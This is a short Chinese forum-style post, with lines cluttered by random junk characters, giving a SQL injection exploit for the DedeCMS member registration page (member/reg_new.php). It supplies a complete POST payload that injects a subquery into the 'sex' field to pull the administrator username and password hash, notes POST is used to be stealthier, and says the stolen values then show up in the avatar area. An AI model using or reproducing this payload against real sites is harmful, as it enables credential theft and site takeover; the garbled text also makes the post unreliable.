dedecms版本 201211227 e& h% l. a& {- U7 j1 t+ I
* `( R! y/ m& m) ?* z/ v
需要magic_quotes_gpc=Off8 G+ Q0 a0 S, Q# ]
, d! H$ _! y7 P2 B/ b& V
应该是没有什么大危害的漏洞.
, e6 d6 i" S5 i% V: X! w原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.( U- J% b! v! r
' n$ w2 |. g% u% ?5 O3 e: ]
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.. Q0 |+ L6 `: t9 l$ W
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
* c1 F9 m/ z7 [- ?$ f8 x& U/ i" k6 z
http:///de/member/reg_new.php
$ w6 w. L! i% w, o8 }0 W1 [. F6 B6 e& }, ~
POST
% K1 j- R, `# b7 p1 L$ g: ?
" Q. f( `3 r: V, _# i2 n O" Z* xdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
7 p$ o3 J; C, W5 v/ P) B, q" k4 T0 S1 E) ?8 b+ C3 B% y+ ~# z# N9 m8 \
成功注册后,头像处里面有好玩的信息." Q$ T; a7 H' z. B- s
5 y- g( m- U( T, W' D+ J7 A |